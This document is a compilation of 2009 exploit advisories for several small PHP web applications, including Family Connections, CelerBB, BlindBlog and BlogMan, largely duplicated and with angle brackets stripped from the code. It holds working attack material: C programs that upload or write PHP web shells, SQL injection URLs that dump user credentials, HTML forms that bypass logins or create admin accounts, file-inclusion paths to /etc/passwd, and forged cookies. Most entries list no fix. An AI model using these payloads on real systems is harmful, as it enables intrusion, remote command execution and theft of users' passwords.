/* Family Connections = 1.8.2 - Remote Shell Upload Exploit Author: Salvatore drosophila Fresta Contact: drosophila...@gmail.com Date: 3 April 2009 The following software will upload a simple php shell. To execute remote commands, you must open the file using a browser. gcc rsue.c -o rsue ./rsue localhost /fcms/ user password [*] Connecting... [+] Connected [*] Send login... [+] Login Successful [+] Uploading... [+] Shell uploaded [+] Connection closed Open your browser and go to http://localhost/fcms/gallery/documents/shell.php?cmd=[commands] */ #include string.h #include stdlib.h #include stdio.h #include sys/types.h #include sys/socket.h #include netinet/in.h #include unistd.h #include netdb.h int socket_connect(char *server, int port) { int fd; struct sockaddr_in sock; struct hostent *host; memset(sock, 0, sizeof(sock)); if((fd = socket(AF_INET, SOCK_STREAM, 0)) 0) return -1; sock.sin_family = AF_INET; sock.sin_port = htons(port); if(!(host=gethostbyname(server))) return -1; sock.sin_addr = *((struct in_addr *)host-h_addr); if(connect(fd, (struct sockaddr *) sock, sizeof(sock)) 0) return -1; return fd; } int socket_send(int socket, char *buffer, size_t size) { if(socket 0) return -1; return write(socket, buffer, size) 0 ? -1 : 0; } char *socket_receive(int socket, int tout) { fd_set input; int ret, byte; char *buffer, *tmp; struct timeval timeout; FD_ZERO(input); FD_SET(socket, input); if(tout 0) { timeout.tv_sec = tout; timeout.tv_usec = 0; } if(socket 0) return NULL; if(!(buffer = (char *) calloc (0, sizeof (char return NULL; while (1) { if(tout 0) ret = select(socket + 1, input, NULL, NULL, timeout); else ret = select(socket + 1, input, NULL, NULL, NULL); if (!ret) break; if (ret 0) return NULL; if(!(tmp = (char *) calloc (1024, sizeof (char return NULL; if ((byte=read(socket, tmp, 1024)) 0) return NULL; if(!byte) break; if(!(buffer = (char *) realloc(buffer, strlen (buffer) + strlen (tmp return NULL; strncat(buffer, tmp, strlen(buffer)+strlen(tmp)); } return buffer; } void usage(char *bn) { printf(\nFamily Connections = 1.8.2 - Remote Shell Upload Exploit\n Author: Salvatore \drosophila\ Fresta\n\n usage: %s server path username password\n example: %s localhost /fcms/ admin 123456\n\n, bn, bn); } int main(int argc, char *argv[]) { int sd; char code[] = --AaB03x\r\n Content-Disposition: form-data; name=\doc\; filename=\shell.php\\r\n Content-Type: text/plain\r\n \r\n ?php echo \pre\; system($_GET['cmd']); echo \/pre\?\r\n --AaB03x\r\n Content-Disposition: form-data; name=\desc\\r\n \r\n description\r\n --AaB03x\r\n Content-Disposition: form-data; name=\submitadd\\r\n \r\n Submit\r\n --AaB03x--\r\n, *buffer = NULL, *rec = NULL, *session = NULL; if(argc 5) { usage(argv[0]); return -1; } if(!(buffer = (char *)calloc(200+strlen(code)+strlen(argv[1])+strlen(argv[2])+strlen(argv[3])+strlen(argv[4]), sizeof(char { perror(calloc); return -1; } sprintf(buffer, POST %sindex.php HTTP/1.1\r\n Host: %s\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: %d\r\n\r\nuser=%spass=%ssubmit=Login, argv[2], argv[1], (strlen(argv[4])+strlen(argv[3])+24), argv[3], argv[4]); printf(\n
Family Connections 1.8.2 Blind SQL Injection (Correct Version)
*** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: = 1.8.2 [+] Website: http://www.familycms.com [+] Bugs: [A] Blind SQL Injection [+] Exploitation: Remote [+] Date: 1 Apr 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Blind SQL Injection [-] File affected: inc/util_inc.php Usually an SQL injection vulnerability located in the authentication system allows a guest to bypass it, and this is just what happens using the following cookie: Cookie name: fcms_login_id Cookie content: -1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,'admin','password',12,13,14,15,16,17,18,19,20,21,22 Cookie server: localhost (change it) Cookie path: / Cookie name: fcms_login_uname Cookie content: admin Cookie server: localhost (change it) Cookie path: / Cookie name: fcms_login_pw Cookie content: password Cookie server: localhost (change it) Cookie path: / Anyway the values contained in the previous cookies are used also by other functions and queries and so is not possible to surf on the vulnerable website with such permissions because the CMS interrupts the sessions each time a SQL error is encountered. For this reason the possibility to write the result of the SQL queries on the files is handy to bypass this limitation. The follows is the vulnerable code: ... elseif (isset($_COOKIE['fcms_login_id'])) { if (isLoggedIn($_COOKIE['fcms_login_id'], $_COOKIE['fcms_login_uname'], $_COOKIE['fcms_login_pw'])) { $_SESSION['login_id'] = $_COOKIE['fcms_login_id']; $_SESSION['login_uname'] = $_COOKIE['fcms_login_uname']; $_SESSION['login_pw'] = $_COOKIE['fcms_login_pw']; } ... in util_inc.php: function isLoggedIn ($userid, $username, $password) { $result = mysql_query(SELECT * FROM `fcms_users` WHERE `id` = $userid LIMIT 1) or die('h1Login Error (util.inc.php 275)/h1' . mysql_error()); if (mysql_num_rows($result) 0) { $r = mysql_fetch_array($result); if ($r['username'] !== $username) { return false; } elseif ($r['password'] !== $password) { return false; } else { return true; } } else { return false; } } * [+] Code - [A] Blind SQL Injection /* Family Connection = 1.8.2 - Remote Command Execution Proof of Concept - Written by Salvatore drosophila Fresta The following software will create a file (rce.php) in the specified path using Blind SQL Injection bug. To exec remote commands, you must open the file using a browser. */ #include string.h #include stdlib.h #include stdio.h #include sys/types.h #include sys/socket.h #include netinet/in.h #include unistd.h #include netdb.h int socket_connect(char *server, int port) { int fd; struct sockaddr_in sock; struct hostent *host; memset(sock, 0, sizeof(sock)); if((fd = socket(AF_INET, SOCK_STREAM, 0)) 0) return -1; sock.sin_family = AF_INET; sock.sin_port = htons(port); if(!(host=gethostbyname(server))) return -1; sock.sin_addr = *((struct in_addr *)host-h_addr); if(connect(fd, (struct sockaddr *) sock, sizeof(sock)) 0) return -1; return fd; } int socket_send(int socket, char *buffer, size_t size) { if(socket 0) return -1; return write(socket, buffer, size) 0 ? -1 : 0; } void usage(char *bn) { printf(\n\nFamily Connection = 1.8.2 - Remote Command Execution\n Proof of Concept - Written by Salvatore \drosophila\ Fresta\n\n usage: %s server path fs path\n example: %s localhost /fcms/ /var/www/htdocs/fcms/\n\n, bn, bn); } int main(int argc, char *argv[]) { int sd; char code[] = '?php echo \pre\%3b system($_GET[cmd])%3b echo \/prebrbr\%3b?', *buffer; if(argc 4) { usage(argv[0]); return -1; } if(!(buffer = (char *)calloc(216+strlen(argv[1])+strlen(argv[2])+strlen(argv[3]), sizeof(char { perror(calloc); return -1; } sprintf(buffer, GET %shome.php HTTP/1.1\r\n Host: %s\r\n Cookie: fcms_login_id=-1 UNION ALL SELECT %s,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '%srce.php'#\r\n\r\n, argv[2], argv[1], code, argv[3
Family Connections 1.8.1 Multiple Remote Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User html head titleFamily Connection 1.8.1 Create Admin User Exploit/title /head body pThis exploit creates an user with administrator privileges using follows information:br Username: rootbr Password: toorbr form action=http://localhost/fcms/register.php; method=POST input type=hidden name=username value=blabla input type=hidden name=password value=blabla input type=hidden name=email value=bla...@blabla.blabla input type=hidden name=fname value=blabla input type=hidden name=lname value=blabla input type=hidden name=year value=00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 'r...@owned.com', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#' input type=submit name=submit value=Exploit /form /body /html To activate accounts: http://www.site.com/path/activate.php?uid=1 or 1=1code= [C] Blind SQL Injection POST /path/lostpw.php HTTP/1.1\r\n Host: www.site.com\r\n Content-Type: application/x-www-form-urlencoded\r\n Content-Length: 193\r\n\r\n email=-1' UNION ALL SELECT '?php echo pre; system($_GET[cmd]); echo /prebrbr;?',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'# To execute commands: http://www.site.com/path/rce.php?cmd=ls * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User html head titleFamily Connection 1.8.1 Create Admin User Exploit/title /head body pThis exploit creates an user with administrator privileges using follows information:br Username: rootbr Password: toorbr form action=http://localhost/fcms/register.php; method=POST input type=hidden name=username value=blabla input type=hidden name=password value=blabla input type=hidden name=email value=bla...@blabla.blabla input type=hidden name=fname value=blabla
Community CMS 0.5 Multiple SQL Injection Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Community CMS [+] Version: 0.5 [+] Website: http://sourceforge.net/projects/communitycms/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Dork: intext:Powered by Community CMS [+] Date: 30 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] File affected: view.php, calendar.php This bug allows a guest to view username and password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users http://www.site.com/path/index.php?id=2view=eventa=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23 * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Community CMS [+] Version: 0.5 [+] Website: http://sourceforge.net/projects/communitycms/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Dork: intext:Powered by Community CMS [+] Date: 30 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] File affected: view.php, calendar.php This bug allows a guest to view username and password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users http://www.site.com/path/index.php?id=2view=eventa=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23 * [+] Fix No fix. *
phpCommunity 2 2.1.8 Multiple Vulnerabilities (SQL Injection / Directory Traversal / XSS)
*** Salvatore drosophila Fresta *** [+] Application: phpCommunity 2 [+] Version: 2.1.8 [+] Website: http://sourceforge.net/projects/phpcommunity2/ [+] Bugs: [A] Multiple SQL Injection [B] Directory Traversal [C] Reflected XSS [+] Exploitation: Remote [+] Date: 07 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs This web application presents several vulnerabilities which can be exploited to obtain reserved information. The following are examples of vulnerabilities discovered in this application. - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: module/forum/class_forum.php module/forum/class_search.php This bug allows a guest to view username and password of a registered user. - [B] Directory Traversal [-] Requisites: none [-] File affected: module/admin/files/show_file.php, module/admin/files/show_source.php This bug allows a guest to read arbitrary files and directory on the web server. - [C] Reflected XSS [-] Requisites: none [-] File affected: templates/1/login.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/index.php?n=guestc=0m=forums=1forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=forums=2forum_id=0topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=searchs=idwert=-1%25; UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=searchs=nickwert=-1%25; UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=searchs=forumwert=-1%25; UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23 - [B] Directory Traversal http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd http://www.site.com/path/module/admin/files/show_source.php?path=/etc - [C] Reflected XSS http://www.site.com/path/templates/1/login.php?msg=scriptalert('XSS');/script * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: phpCommunity 2 [+] Version: 2.1.8 [+] Website: http://sourceforge.net/projects/phpcommunity2/ [+] Bugs: [A] Multiple SQL Injection [B] Directory Traversal [C] Reflected XSS [+] Exploitation: Remote [+] Date: 07 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs This web application presents several vulnerabilities which can be exploited to obtain reserved information. The following are examples of vulnerabilities discovered in this application. - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: module/forum/class_forum.php module/forum/class_search.php This bug allows a guest to view username and password of a registered user. - [B] Directory Traversal [-] Requisites: none [-] File affected: module/admin/files/show_file.php, module/admin/files/show_source.php This bug allows a guest to read arbitrary files and directory on the web server. - [C] Reflected XSS [-] Requisites: none [-] File affected: templates/1/login.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/index.php?n=guestc=0m=forums=1forum_id=-1' UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=forums=2forum_id=0topic_id=-1' UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=searchs=idwert=-1%25; UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=searchs=nickwert=-1%25; UNION ALL SELECT CONCAT(nick, 0x3a, pwd),2 FROM com_users%23 http://www.site.com/path/index.php?n=guestc=0m=searchs=forumwert=-1%25; UNION ALL SELECT 1,2,3,4,CONCAT(nick, 0x3a, pwd),6 FROM com_users%23 - [B] Directory Traversal http://www.site.com/path/module/admin/files/show_file.php?file=../../../../../../../../etc/passwd http://www.site.com/path/module/admin/files/show_source.php?path=/etc - [C] Reflected XSS http://www.site.com/path
nForum 1.5 Multiple SQL Injection
*** Salvatore drosophila Fresta *** [+] Application: nForum [+] Version: 1.5 [+] Website: http://sourceforge.net/projects/nforum/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 06 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: showtheme.php, userinfo.php These bugs allows a guest to view username and the password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23 http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23 * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: nForum [+] Version: 1.5 [+] Website: http://sourceforge.net/projects/nforum/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Date: 06 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: showtheme.php, userinfo.php These bugs allows a guest to view username and the password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/showtheme.php?id=-1' UNION ALL SELECT 1,2,CONCAT(name, 0x3a, passwd_hash),NULL,5,6,7 FROM users%23 http://www.site.com/path/userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23 * [+] Fix No fix. *
CelerBB 0.0.2 Multiple Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: CelerBB [+] Version: 0.0.2 [+] Website: http://celerbb.sourceforge.net/ [+] Bugs: [A] Multiple SQL Injection [B] Information Disclosure [C] Authenticaion Bypass [+] Exploitation: Remote [+] Date: 05 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewforum.php, viewtopic.php This bug allows a guest to view username and password list. - [B] Information Disclosure [-] Requisites: none [-] File affected: showme.php This bug allows a guest to view reserved information of any user. - [C] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass authentication. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23 http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23 - [B] Information Disclosure http://www.site.com/path/showme.php?user=admin - [C] Authentication Bypass html head titleCelerBB 0.0.2 Authentication Bypass Exploit/title /head body form action=login.php method=POST input type=hidden name=Username value=admin'# input type=submit value=Exploit /form /body /html * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: CelerBB [+] Version: 0.0.2 [+] Website: http://celerbb.sourceforge.net/ [+] Bugs: [A] Multiple SQL Injection [B] Information Disclosure [C] Authenticaion Bypass [+] Exploitation: Remote [+] Date: 05 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: viewforum.php, viewtopic.php This bug allows a guest to view username and password list. - [B] Information Disclosure [-] Requisites: none [-] File affected: showme.php This bug allows a guest to view reserved information of any user. - [C] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php This bug allows a guest to bypass authentication. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23 http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23 - [B] Information Disclosure http://www.site.com/path/showme.php?user=admin - [C] Authentication Bypass html head titleCelerBB 0.0.2 Authentication Bypass Exploit/title /head body form action=login.php method=POST input type=hidden name=Username value=admin'# input type=submit value=Exploit /form /body /html * [+] Fix No fix. *
WARNING - CORRECT: BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI)
*** Salvatore drosophila Fresta *** [+] Application: BlindBlog [+] Version: 1.3.1 [+] Website: http://sourceforge.net/projects/cbblog/ [+] Bugs: [A] SQL Injection [B] Authentication Bypass [C] Local File Inclusion [+] Exploitation: Remote [+] Date: 03 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: comment.php All queries are vulnerable. This bug allows a guest to view username and the password of a registered user. $id = (isset($_GET['id']) $_GET['id'] !='') ? $_GET['id'] : getlastid(); $SQL = SELECT comment,author,contact,date FROM `cblog_comments` WHERE `pid` = '$id' ORDER BY `cid` DESC; $resulted = $db-query($SQL, $querys); while ($result = mysql_fetch_assoc($resulted)) $comments[] = $result; - [B] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: admin.login.php $username = $_POST['username']; $password = md5($_POST['password']); include('./db_config.php'); $db = new db_stuff; $db-connect(); $result = $db-query(SELECT * FROM `cblog_users` WHERE `username` = '$username', $querys); if (mysql_num_rows($result) 1 || mysql_num_rows($result) 1) { echo Incorrect username; exit; } $result = mysql_fetch_assoc($result); if ($result['password'] !== $password) { echo 'Incorrect Password'; exit; } - [C] Local File Inclusion [-] Requisites: none [-] File affected: admin.php This bug allow an admin to include local files. It is possible bypass authentication using the previous bug. With this bug is possible to execute remote commands using Apache logs. ... } else if (isset($_GET['act']) $_SESSION['is_admin']) { $loc = 'admin.'.$_GET['act'].'.php'; include('./'.$loc); } ... * [+] Code - [A] SQL Injection http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23 - [B] Authentication Bypass html head titleBlindBlog 1.3.1 Authentication Bypass Exploit/title /head body form action=http://www.site.com/path/admin/admin.login.php?go=1; method=POST input type=hidden name=username value=-1' UNION ALL SELECT 1,'admin',MD5('expl')# input type=hidden name=password value=expl input type=submit value=Exploit /form /body /html - [C] Local File Inclusion Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd%00 -- Salvatore drosophila Fresta CWNP444351
BlindBlog 1.3.1 Multiple Vulnerabilities (SQL Inj - Auth Bypass - LFI)
*** Salvatore drosophila Fresta *** [+] Application: BlindBlog [+] Version: 1.3.1 [+] Website: http://sourceforge.net/projects/cbblog/ [+] Bugs: [A] SQL Injection [B] Authentication Bypass [C] Local File Inclusion [+] Exploitation: Remote [+] Date: 03 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: comment.php All queries are vulnerable. This bug allows a guest to view username and the password of a registered user. $id = (isset($_GET['id']) $_GET['id'] !='') ? $_GET['id'] : getlastid(); $SQL = SELECT comment,author,contact,date FROM `cblog_comments` WHERE `pid` = '$id' ORDER BY `cid` DESC; $resulted = $db-query($SQL, $querys); while ($result = mysql_fetch_assoc($resulted)) $comments[] = $result; - [B] Authentication Bypass [-] Requisites: magic_quotes_gpc = off [-] File affected: admin.login.php $username = $_POST['username']; $password = md5($_POST['password']); include('./db_config.php'); $db = new db_stuff; $db-connect(); $result = $db-query(SELECT * FROM `cblog_users` WHERE `username` = '$username', $querys); if (mysql_num_rows($result) 1 || mysql_num_rows($result) 1) { echo Incorrect username; exit; } $result = mysql_fetch_assoc($result); if ($result['password'] !== $password) { echo 'Incorrect Password'; exit; } - [C] Local File Inclusion [-] Requisites: none [-] File affected: admin.php This bug allow an admin to include local files. It is possible bypass authentication using the previous bug. With this bug is possible to execute remote commands using Apache logs. ... } else if (isset($_GET['act']) $_SESSION['is_admin']) { $loc = 'admin.'.$_GET['act'].'.php'; include('./'.$loc); } ... * [+] Code - [A] SQL Injection http://www.site.com/path/comment.php?id=-1' UNION ALL SELECT NULL,CONCAT(username, char(58), password),3,4 FROM cblog_users%23 - [B] Authentication Bypass html head titleBlindBlog 1.3.1 Authentication Bypass Exploit/title /head body form action=http://www.site.com/path/admin/admin.login.php?go=1; method=POST input type=hidden name=username value=-1' UNION ALL SELECT 1,'admin',MD5('expl')# input type=hidden name=password value=expl input type=submit value=Exploit /form /body /html - [C] Local File Inclusion Tested on MAC OSX: /Applications/xampp/xamppfiles/htdocs/cbblog/admin/admin.php http://www.site.com/path/admin/admin.php?act=/../../../../../../../etc/passwd
BlogMan 0.45 Multiple Vulnerabilities
*** Salvatore drosophila Fresta *** Application: BlogMan http://sourceforge.net/projects/blogman/ Version: 0.45 Bug: * Multiple SQL Injection * Authentication Bypass * Privilege Escalation Exploitation: Remote Date: 1 Mar 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com * - BUGS This blog is entirely vulnerable to SQL Injection. The following are vulnerable queries that can be used to obtain reserved information. #[1] SQL Injection: Requisites: magic_quotes_gpc = off File affected: index.php, register.php, viewall.php The following lines are improperly checked: /* if (isset($_COOKIE['blogmanuserid'])) { $id = $_COOKIE['blogmanuserid']; $query = SELECT * FROM user WHERE UserID='.$id.'; $user = mysql_fetch_array(mysql_query($query)) or die(mysql_error()); echo p class='loginusername'a href='edit.php?id=.$id.'.$user['UserName']./a/p\n; */ Using a cookie editor it is possible to edit that cookie and manage the query, as follows: Name: blogmanuserid Content: -1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user# Server: target_server (example: localhost) Path: /blogman/ #[2] SQL Injection: Requisites: magic_quotes_gpc = off File affected: read.php This bug allows a guest to view the username and password of a registered user. http://site/path/read.php?id=-1'UNION ALL SELECT NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23 #[3] SQL Injection: Requisites: magic_quotes_gpc = off File affected: profile.php This bug allows a guest to view the username and password of a registered user. http://site/path/profile.php?id=-1' UNION ALL SELECT 1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16 FROM user%23 #[1] Authentication Bypass: Requisites: magic_quotes_gpc = off File affected: doLogin.php The following lines are improperly checked: /* $un = $_POST['un']; $pw = $_POST['pw']; ... $pwHashed = mysql_fetch_array(mysql_query(SELECT PASSWORD('.$pw.'))); $userRow = mysql_fetch_array(mysql_query(SELECT * FROM user WHERE UserName='.$un.')); if ($userRow['UserPassword'] == $pwHashed[0] $userRow['UserActive'] !$userRow['UserDisabled']) { $expires = time() + 3*24*60*60; setcookie(blogmanuserid, $userRow['UserID'], $expires); } */ Using a SQL Injection bug it is possible to bypass conditions and to set an arbitrary UserID value. The following information must be sent using POST method to doLogin.php un = ' UNION ALL SELECT 1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL# pw = mypass The First value is UserID, the third value is the password, the tenth value is UserDisabled and the eleventh value is UserActive. #[2] Authentication Bypass: Requisites: none File affected: all It is possible to bypass the authentication system by creating a cookie named 'blogmanuserid', and inserting the value of a registered user id into the content(sometimes 1 for admin): Name: blogmanuserid Content: 1 Server: target_server (example: localhost) Path: /blogman/ Privilege Escalation: Requisites: magic_quotes_gpc = off File affected: admin.php It is possible to escalate privileges using a SQL Injection bug through a cookie. The following lines are improperly checked: /* $id = $_COOKIE['blogmanuserid']; $user = mysql_fetch_array(mysql_query(SELECT * FROM user WHERE UserID='.$id.')); if (!$user['UserCanAdmin']) { echo meta http-equiv='refresh' content='0;index.php'/head/html; } else { ... } */ Name: blogmanuserid Content: -1' UNION ALL SELECT 